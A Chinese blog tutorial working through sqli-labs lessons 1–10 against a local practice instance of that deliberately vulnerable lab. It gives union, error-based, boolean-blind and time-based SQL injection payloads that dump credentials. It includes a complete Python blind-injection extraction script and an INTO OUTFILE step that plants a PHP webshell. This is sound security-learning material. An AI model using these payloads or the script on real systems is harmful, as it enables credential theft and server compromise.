通过sqli-labs学习sql注入——基础挑战之less1-10

欢迎光顾我的新博客:https://www.giantbranch.cn

本文链接:http://blog.csdn.net/u012763794/article/details/51207833

虽然sql注入接触过不少,其实也不太多,但是不系统,那就通过sqli-libs系统学习总结一下吧

注:第一个就说得详细一点,后面的有新知识才会说,所以第一个一定要看!!!如果第一个还有不明白的地方,欢迎评论提问,注意一定自己要先实践。

 

我的学习的方法是什么呢?

先自己尝试一下注入,实在不行就看源码,再不行就看别人的指导,反正就是要弄懂

 

开篇先说说一些基础知识,当然一些基本的sql语句就自己去学吧(根据学习进程更新),less1的基础知识也是比较多的!!,学到学不动了再写个总结吧

url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个%

具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码

常用的写出来吧: 空格是%20,单引号是%27, 井号是%23,双引号是%22

判断sql注入(显错和基于错误的盲注):单引号,and 1=1  和and 1=2,双引号,反斜杠,注释等

判断基于时间的盲注:在上面的基础上,加个sleep函数 ,如sleep(5) (函数不同数据库有所不同)例子:   ' and sleep(5)    " and sleep(5)

 

sql 注入的基本步骤(这个跟sqlmap的步骤基本一致吧)


判断是什么类型注入,有没过滤了关键字,可否绕过


获取数据库用户,版本,当前连接的数据库等信息


获取某个数据库表的信息


获取列信息


最后就获取数据了

 

为了方便学习查看,可以在源码中的$sql下一句语句写以下php语句(就是输出拿到数据库查询的完整语句是怎么样的)

 

echo "你的 sql 语句是:".$sql."
";

 

注:下面的可能有很多种注入方法,仅举例一种

less 1   GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

 

直接在后面加个单引号(当然你要在后面先加?id=一个数字),单引号被自动url编码了

发现报了sql语句的语法错误,那么应该存在sql注入,因为没过滤单引号,我们就可以闭合单引号注入什么的

SELECT * FROM users WHERE id='1''  这样拿去查询肯定报错啊,单引号都不匹配

 

接下来猜字段,由于出了点问题,原来浏览器没帮我把#url编码

通过sqli-labs学习sql注入——基础挑战之less1-10_第1张图片

'#'url编码后就是%23,如果是post注入提交#不用编码也行

通过sqli-labs学习sql注入——基础挑战之less1-10_第2张图片

可以看到没有第四列,所以只有3个字段

通过sqli-labs学习sql注入——基础挑战之less1-10_第3张图片

下面直接用union 语句查询,先看看1,2,3

通过sqli-labs学习sql注入——基础挑战之less1-10_第4张图片

怎么没有1,2,3中的两个出现呢,直接将语句复制到数据库的命令行也是可以查询到两行的啊!

通过sqli-labs学习sql注入——基础挑战之less1-10_第5张图片

不急,我们看一下源码,可以看到函数mysql_fetch_array只被调用了一次,而mysql_fetch_array() 函数从结果集中取得一行作为关联数组,或数字数组,或二者兼有,具体看你第二个参数是什么,具体可以看http://www.w3school.com.cn/php/func_mysql_fetch_array.asp,所以这里无论怎么折腾最后只会出来第一行的查询结果

通过sqli-labs学习sql注入——基础挑战之less1-10_第6张图片

这里我们先来看看如何把结果集的所有行都取出来呢,看下面的代码

 

while ($row = mysql_fetch_array($result)) {
  	echo "";
  	echo 'Your Login name:'. $row['username'];
  	echo "
"; echo 'Your Password:' .$row['password']; echo "
"; }

那么我们只要让第一行查询的结果是空集(即union左边的select子句查询结果为空),那么我们union右边的查询结果自然就成为了第一行,就打印在网页上了,这个id他一般传的是数字,而且一般都是从1开始自增的,我们可以把id值设为非正数(负数或0),浮点数,字符型或字符串都行,下面的就是分别举例了

 

通过sqli-labs学习sql注入——基础挑战之less1-10_第7张图片通过sqli-labs学习sql注入——基础挑战之less1-10_第8张图片通过sqli-labs学习sql注入——基础挑战之less1-10_第9张图片
 

下面就真正查询数据库的各种信息了(可以看到只有第2列和第3列的结果显示在网页上),所以我们就只能用2,3这个位置了,但是两个位置应该是不够用的,这时我们就用到数据库的连接函数了,常用的就concat和concat_ws,其中concat_ws的第一个参数是连接字符串的分隔符,还会用到group__concat(可以把查询出来的多行连接起来)

看看怎么使用

通过sqli-labs学习sql注入——基础挑战之less1-10_第10张图片通过sqli-labs学习sql注入——基础挑战之less1-10_第11张图片再次强调concat_ws的一个参数是连接字符串的分隔符,这里很明显可以看到,但一般第一个参数一般都不是这样传过去的,因为会被html编码,要使用mysql的char函数将十进制ASCII码转化成字符,如下面的(:的十进制ASCII是58),当然这里的分隔符也可以多个字符

通过sqli-labs学习sql注入——基础挑战之less1-10_第12张图片

用的较多的就是这个啦,以后直接复制(32是空格的十进制ASCII)

 

concat_ws(char(32,58,32),user(),database(),version())

 

user():返回当前数据库连接使用的用户

database():返回当前数据库连接使用的数据库

version():返回当前数据库的版本

通过sqli-labs学习sql注入——基础挑战之less1-10_第13张图片
 

接下来查询security数据库中有哪些表

首先说一下mysql的数据库information_schema,他是系统数据库,安装完就有,记录是当前数据库的数据库,表,列,用户权限等信息,下面说一下常用的几个表

SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库名,编码类型路径等,show databases的结果取之此表。

TABLES表:储存mysql中的表信息,(当然也有数据库名这一列,这样才能找到哪个数据库有哪些表嘛)包括这个表是基本表还是系统表,数据库的引擎是什么,表有多少行,创建时间,最后更新时间等。show tables from schemaname的结果取之此表

COLUMNS表:提供了表中的列信息,(当然也有数据库名和表名称这两列)详细表述了某张表的所有列以及每个列的信息,包括该列是那个表中的第几列,列的数据类型,列的编码类型,列的权限,猎德注释等。是show columns from schemaname.tablename的结果取之此表。 

 

详细请看:http://wenku.baidu.com/link?url=bIA38Slp-g2Bob4VDuTSVY8e04Beqq9Xac4I90UMC9ziQuzxiukpEh5abPK-woB9tuQ4DuY_KhKW-eTHH6ACSiMJmRhctiHvijOEFmENBbS

 

通过直接在mysql控制台实验我们可以看到,查询information_schema中的信息时,使用where语句,那个值不能直接用英文,要用单引号包裹着,当然用其十六进制表示也可以,数值类型的就不用单引号了,这对过滤单引号应该有指导意义,至于还有没有其他表示,暂不知道,知道的可以告诉我

 

通过sqli-labs学习sql注入——基础挑战之less1-10_第14张图片

基础讲完了,直接上了(为了方便还是用火狐,插件是hackbar)

通过sqli-labs学习sql注入——基础挑战之less1-10_第15张图片

这时我们又遇到一个问题,只能返回一个table(为什么上面已经说过了),这时我们就要用的limit了, 第一个参数是结果集中的第几个,跟C语言的数组的索引一致,第二个参数就是个数

如 limit  1,2  :返回第二行和第三行,因为1表示是第二行,2表示行数是2

具体看图吧

第二个表

通过sqli-labs学习sql注入——基础挑战之less1-10_第16张图片

第4个表

通过sqli-labs学习sql注入——基础挑战之less1-10_第17张图片

不断变化limit的第一个参数即可枚举所有的表,一旦超出范围,会返回空集

通过sqli-labs学习sql注入——基础挑战之less1-10_第18张图片

可以看到跟phpmyadmin的显示是一致的

通过sqli-labs学习sql注入——基础挑战之less1-10_第19张图片

接下来列举users的列名,因为一般我们只关心用户的账号密码,有了它其他的登陆后一般就能查看了,拿到管理员的就最好不过了

通过sqli-labs学习sql注入——基础挑战之less1-10_第20张图片

同样也是用limit一个一个来,就知道字段有id,username,password

通过sqli-labs学习sql注入——基础挑战之less1-10_第21张图片

那么最后一步了,那就简单了,直接select出来就好

通过sqli-labs学习sql注入——基础挑战之less1-10_第22张图片

那么用户和密码就一个一个出来了

当然这里注入可以多样的,其实是换汤不换药,相同的都是用limit控制结果集的具体是那一行

如下面的,--后面要有空格(某些情况+可以代替空格,+浏览器会编码成空格吧好像),你可以直接放phpmyadmin中测试

 

http://localhost/sqli-labs/Less-1/?id=-1' or 1=1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from  users limit 1,1 --+
http://localhost/sqli-labs/Less-1/?id=-1' and 1=2 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from  users limit 1,1 -- k

这个你们可以具体实践一下,最重要的就是实践了,我也喜欢,这里截个图吧,--有无空格的情况

 

通过sqli-labs学习sql注入——基础挑战之less1-10_第23张图片通过sqli-labs学习sql注入——基础挑战之less1-10_第24张图片

 

第一个就说得详细一点,后面的有新知识才会说

 

less 2 GET - Error based - Intiger based (基于错误的GET整型注入)

 

这里跟上面几乎一样,只是$id没用单引号引着,(因为sql语句对于数字型的数据可以不加单引号),不写单引号的注入就更简单了

因为完全不用闭合‘或者注释后面的’,但因为这里只是从结果集获取1行数据,要获取全部数据还是要注释后面的,自己加个limit子句

通过sqli-labs学习sql注入——基础挑战之less1-10_第25张图片

利用与上面基本相同,只是把下面的话就-1右边的单引号去掉就可以了

 

http://localhost/sqli-labs/Less-2/?id=-1 union select 1,2,concat_ws(char(32,58,32),id,database(),password) from  users limit 0,1 %23

 

这个还有什么又不一样的可以告诉我

 

less 3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

 

首先加个单引号看看

通过sqli-labs学习sql注入——基础挑战之less1-10_第26张图片

可以看到报错那里出来了一个),原来这就是单引号注入的变形,那么我们在没有最终的sql语句的情况下怎么判断呢

首先看到near和at之间的字符串,直接将左右的引号去掉,那么就得到'-1'') LIMIT 0,1 

我们明显看到-1的右边多了一个'这是似成相识的感觉吧,后面还有个),那么对于的左边也有(,我们看看代码是不是 id=('$id'),确实是的

payload:(应该是起作用的东东,应该可以这么理解吧)

http://localhost/sqli-labs/Less-3/?id=-1%27) union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 6,1 --+

 

 

 

less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

 

直接上单引号,发现没有报错,这是为什么呢,因为php中双引号可以包含单引号

通过sqli-labs学习sql注入——基础挑战之less1-10_第27张图片

所以我们在判断注入时,要加入双引号进行判断哦,而且从下图可看到右括号,那么我们要用右括号闭合左括号

通过sqli-labs学习sql注入——基础挑战之less1-10_第28张图片

 

payload:

http://localhost/sqli-labs/Less-4/?id=1") union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 -- k

 

less 5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

双注入是什么意思呢,看网上的好像是两个select

难道是这样

http://localhost/sqli-labs/Less-5/?id=1' union select 1,2,(select database()) %23

 

这个跟less2一样,看下面就知道,那么他为啥没东西出来呢,看看源码咯

 

通过sqli-labs学习sql注入——基础挑战之less1-10_第29张图片

完全没输出$row,当然就没有了

通过sqli-labs学习sql注入——基础挑战之less1-10_第30张图片

这里我们用闭合的方法吧,那就,不用注释了

payload:

 

http://localhost/sqli-labs/Less-5/?id=1' union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 union select   1,2,'3


但是实践中,发现可以还可以加中文引号和中文,具体原理性的东西需要研究

 

通过sqli-labs学习sql注入——基础挑战之less1-10_第31张图片

通过sqli-labs学习sql注入——基础挑战之less1-10_第32张图片
 

2017.01.11更新:有位用户评论,所以去查了一下

参考资料:http://www.2cto.com/article/201303/192718.html

 

简单的一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。

比如聚合函数count(*),就是多个东西的结果,count(*)返回的是总行数嘛

payload

 

http://localhost/sqli-labs/Less-5/?id=1' union select count(*),count(*), concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23
当然只有一个也行
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat((select database()), floor(rand()*2)) as a from information_schema.tables group by a%23

 

 

 

由于这里有随机性,所以要多刷新几遍才显示出来

通过sqli-labs学习sql注入——基础挑战之less1-10_第33张图片

当然为了让结果更清晰,可以加分隔符

比如通过sqli-labs学习sql注入——基础挑战之less1-10_第34张图片

http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

 

 

给一下具体payload吧,less 6即就改成双引号就好

查表,改一下limit后面的数字就好

 

第一个表
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a%23
http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 1,1),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

查列

 

 

http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

查数据

 

 

http://localhost/sqli-labs/Less-5/?id=1' union select count(*),1, concat('~',(select email_id from emails limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

 

 

 

less 6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

这也是双注入,醉了,知道的告诉我吧

这里直接给payload,其实很多都可以,你想得到就好

http://localhost/sqli-labs/Less-6/?id=1" union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 -- k
//下面的这个”是中文双引号
http://localhost/sqli-labs/Less-6/?id=1哈哈“ union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 -- k
http://localhost/sqli-labs/Less-6/?id=1哈哈“ union select 1,2,concat_ws(char(32,58,32),id,username,password) from  users limit 1,1 and ”+

继续随便乱搞,发现这语法也可以

SELECT * FROM users WHERE id=("1哈哈“ union select 1,2,concat_ws(char(32,58,32),id,username,password) from users文化馆发送到高 limit 1,1 呵呵and ” ") LIMIT 0,1

前面的less4测试过也是可以,那么前面的单引号的课程改一下应该也是可以的

 

2017.01.11更新:

根据less5,这里也一样了,只不过是双引号而已,上面的less5改为双引号就好

 

http://localhost/sqli-labs/Less-6/?id=1" union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a%23

 

less 7 GET - Dump into outfile - String (导出文件GET字符型注入)

 

导出到文件就是可以将查询结果导出到一个文件中,如常见的将一句话木马导出到一个php文件中,sqlmap中也有导出一句话和一个文件上传的页面

常用的语句是:  select "" into outfile "XXX\test.php" ,当这里要获取到网站的在系统中的具体路径(绝对路径)

这个要怎么获取呢,根据系统和数据库猜测,如winserver的iis默认路径是c:/inetpub/wwwroot/,这好像说偏了,这是asp的,但知道也好

linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等

apache 就/var/www/htm,/var/www/html/htdocs

具体我也不是很熟悉

下面给一个很有可能获取得到的方法,(因为less7不输出信息,先从less获取信息)

首先介绍两个可以说是函数,还是变量的东西

@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径

通过sqli-labs学习sql注入——基础挑战之less1-10_第35张图片

如上图,因为看到wamp,那么默认的网站的根目录的绝对路径就是E:\wamp\www了

 

一开始报错,不知为什么

通过sqli-labs学习sql注入——基础挑战之less1-10_第36张图片

 

那就将语句放到phpmyadmin看看咯

通过sqli-labs学习sql注入——基础挑战之less1-10_第37张图片

原来是路径的问题,转义一下就可以了吧
通过sqli-labs学习sql注入——基础挑战之less1-10_第38张图片

注意:文件不能覆盖,如下图(所以只能执行一次,只能换名字了)

 

最后的payload:

http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23

通过sqli-labs学习sql注入——基础挑战之less1-10_第39张图片

那么可以直接上菜刀了

通过sqli-labs学习sql注入——基础挑战之less1-10_第40张图片通过sqli-labs学习sql注入——基础挑战之less1-10_第41张图片

 

当然除了导出文件还有导入文件,因为这里前端没显示数据,可以导入导出同时使用即可

通过sqli-labs学习sql注入——基础挑战之less1-10_第42张图片

通过sqli-labs学习sql注入——基础挑战之less1-10_第43张图片

 

less 8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

 

发现加个单引号跟没加显示不一样,加了单引号连you are in都不显示了,没有报错,所以只能用盲注判断了

 

盲注需要掌握一些MySQL的相关函数:
length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

 ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

 

首先要记得常见的ASCII,A:65,Z:90 a:97,z:122,  0:48, 9:57

 

首先select database()查询数据库

ascii(substr((select database()),1,1)):返回数据库名称的第一个字母,转化为ascii码

ascii(substr((select database()),1,1))>64:ascii大于64就返回true,if就返回1,否则返回0

http://localhost/sqli-labs/Less-8/?id=1' and if(ascii(substr((select database()),1,1))>64, 1, 0) %23

或者这样就简单一点

http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>64 %23

 

为什么这里是布尔型盲注呢,因为这里没把数据输出,只是$row有数据和无数据的时候显示的结果不一样

通过sqli-labs学习sql注入——基础挑战之less1-10_第44张图片

 

猜数据库名第一个字母具体过程,使用二分法

http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1)>64 %23 返回正确,大于64
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>96 %23 返回正确,大于96
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))<123 %23 返回正确,小于123 ,区间在97-122
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>109 %23 返回正确,大于109,区间在110-122
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>116 %23 返回错误,所以在110-116之间
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>112 %23 返回正确,大于112,区间在113-116之间
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>114 %23 返回正确,大于114,间在115-116之间
http://localhost/sqli-labs/Less-8/?id=1' and ascii(substr((select database()),1,1))>115 %23 返回错误,不大于115,即第一个字母的ascii为115,即字母s

 

盲注过程是漫长的,一般是自己写脚本或使用工具辅助

写脚本之前要知道原理,上面的就是原理

 

下面基于这个写了个提取users表数据的完整脚本,大家可以参考下,当然如果大家用sqlmap也可以

# -*-coding:utf-8-*-

""" 
@version:  
@author: giantbranch 
@file: blindsqlinjection.py 
@time: 2016/5/1  
""" 

import urllib2
import urllib


success_str = "You are in"
getTable = "users"

index = "0"
url = "http://localhost/sqli-labs/Less-8/?id=1"
database = "database()"
selectDB = "select database()" 
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"


asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"
lengthPayload = "' and length(%s)>=%d #"
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"

selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit " 
selectTableNameLengthPayloadbehind = ",1)>=%d #"


# 发送请求,根据页面的返回的判断长度的猜测结果
# string:猜测的字符串	payload:使用的payload	length:猜测的长度
def getLengthResult(payload, string, length):
	finalUrl = url + urllib.quote(payload % (string, length))
	res = urllib2.urlopen(finalUrl)
	if success_str in res.read():
		return True
	else:
		return False

# 发送请求,根据页面的返回的判断猜测的字符是否正确
# payload:使用的payload	string:猜测的字符串	pos:猜测字符串的位置	ascii:猜测的ascii
def getResult(payload, string, pos, ascii):
	finalUrl = url + urllib.quote(payload % (string, pos, ascii))
	res = urllib2.urlopen(finalUrl)
	if success_str in res.read():
		return True
	else:
		return False

# 注入
def inject():
	# 猜数据库长度
	lengthOfDBName = getLengthOfString(lengthPayload, database)
	print "length of DBname: " + str(lengthOfDBName)
	# 获取数据库名称
	DBname = getName(asciiPayload, selectDB, lengthOfDBName)
	
	print "current database:" + DBname

	# 获取数据库中的表的个数
	# print selectTableCountPayload
	tableCount = getLengthOfString(selectTableCountPayload, DBname)
	print "count of talbe:" + str(tableCount)

	# 获取数据库中的表
	for i in xrange(0,tableCount):
		# 第几个表
		num = str(i)
		# 获取当前这个表的长度
		selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
		tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
		print "current table length:" + str(tableNameLength)
		# 获取当前这个表的名字
		selectTableName = selectTable%(DBname, i)
		tableName = getName(asciiPayload, selectTableName ,tableNameLength)
		print tableName


	selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s')>=%d #"
	# print selectColumnCountPayload
	# 获取指定表的列的数量
	columnCount = getLengthOfString(selectColumnCountPayload, getTable)
	print "table:" + getTable + " --count of column:" + str(columnCount)

	# 获取该表有多少行数据
	dataCountPayload = "'and (select count(*) from %s)>=%d #"
	dataCount = getLengthOfString(dataCountPayload, getTable)
	print "table:" + getTable + " --count of data: " + str(dataCount)

	data = []
	# 获取指定表中的列
	for i in xrange(0,columnCount):
		# 获取该列名字长度
		selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit "+ str(i) +",1)>=%d #"
		# print selectColumnNameLengthPayload
		columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)
		print "current column length:" + str(columnNameLength)
		# 获取该列的名字
		selectColumn = "select column_name from information_schema.columns where table_schema='"+ DBname +"' and table_name='%s' limit %d,1"
		selectColumnName = selectColumn%(getTable, i)
		# print selectColumnName
		columnName = getName(asciiPayload, selectColumnName ,columnNameLength)
		print columnName

		tmpData = []
		tmpData.append(columnName)
		# 获取该表的数据
		for j in xrange(0,dataCount):
			columnDataLengthPayload = "'and (select length("+ columnName +") from %s limit " + str(j) + ",1)>=%d #"
			# print columnDataLengthPayload
			columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)
			# print columnDataLength
			selectData = "select " + columnName + " from users limit " + str(j) + ",1"
			columnData = getName(asciiPayload, selectData, columnDataLength)
			# print columnData
			tmpData.append(columnData)
	
		data.append(tmpData)

	# print data	
	# 格式化输出数据
	# 输出列名
	tmp = ""
	for i in xrange(0,len(data)):
		tmp += data[i][0] + "	"
	print tmp
	# 输出具体数据
	for j in xrange(1,dataCount+1):
		tmp = ""
		for i in xrange(0,len(data)):
			tmp += data[i][j] + "	"
		print tmp
	
# 获取字符串的长度			
def getLengthOfString(payload, string):
	# 猜长度
	lengthLeft = 0
	lengthRigth = 0
	guess = 10
	# 确定长度上限,每次增加5
	while 1:
		# 如果长度大于guess
		if getLengthResult(payload, string, guess) == True:
			# 猜测值增加5
			guess = guess + 5	
		else:
			lengthRigth = guess
			break
	# print "lengthRigth: " + str(lengthRigth)
	# 二分法查长度
	mid = (lengthLeft + lengthRigth) / 2
	while lengthLeft < lengthRigth - 1:
		# 如果长度大于等于mid 
		if getLengthResult(payload, string, mid) == True:
			# 更新长度的左边界为mid
			lengthLeft = mid
		else: 
		# 否则就是长度小于mid
			# 更新长度的右边界为mid
			lengthRigth = mid
		# 更新中值
		mid = (lengthLeft + lengthRigth) / 2		
		# print lengthLeft, lengthRigth
	# 因为lengthLeft当长度大于等于mid时更新为mid,而lengthRigth是当长度小于mid时更新为mid
	# 所以长度区间:大于等于 lengthLeft,小于lengthRigth
	# 而循环条件是 lengthLeft < lengthRigth - 1,退出循环,lengthLeft就是所求长度
	# 如循环到最后一步 lengthLeft = 8, lengthRigth = 9时,循环退出,区间为8<=length<9,length就肯定等于8
	return lengthLeft

# 获取名称
def getName(payload, string, lengthOfString):
	# 32是空格,是第一个可显示的字符,127是delete,最后一个字符
	tmp = ''
	for i in xrange(1,lengthOfString+1):
		left = 32 
		right = 127
		mid = (left + right) / 2
		while left < right - 1:
			# 如果该字符串的第i个字符的ascii码大于等于mid
			if getResult(payload, string, i, mid) == True:
				# 则更新左边界
				left = mid
				mid = (left + right) / 2
			else:
			# 否则该字符串的第i个字符的ascii码小于mid
				# 则更新右边界
				right = mid
			# 更新中值
			mid = (left + right) / 2
		tmp += chr(left)
		# print tmp
	return tmp	
		

def main():
	inject()
main()

运行结果:

通过sqli-labs学习sql注入——基础挑战之less1-10_第45张图片
 

 

less 9 GET - Blind - Time based. -  Single Quotes  (基于时间的GET单引号盲注)

 

判断为单引号基于时间的注入
http://localhost/sqli-labs/Less-9/?id=1' and sleep(5) %23

 

这里直接给payload

http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23

http://localhost/sqli-labs/Less-9/?id=1' and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23

判断数据库名的第一个字母为s(ascii为115),判断错误的话是暂停5秒

 

 

那么这里为什么必须基于时间呢,因为你怎么输入,输出结果都是You are in ,这就必须通过时间来判断了

通过sqli-labs学习sql注入——基础挑战之less1-10_第46张图片

 

less 10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

把上面的改成双引号就行

 

判断为基于时间的双引号注入

http://localhost/sqli-labs/Less-10/?id=1" and sleep(5) %23

 

http://localhost/sqli-labs/Less-10/?id=1" and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
http://localhost/sqli-labs/Less-10/?id=1" and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23



有时间把时间盲注也搞个脚本出来,把上面的payload和判断条件改一下应该就可以了

 

 

 

 

你可能感兴趣的:(信息安全,sql注入,sqli-labs,sql注入,sqli-labs)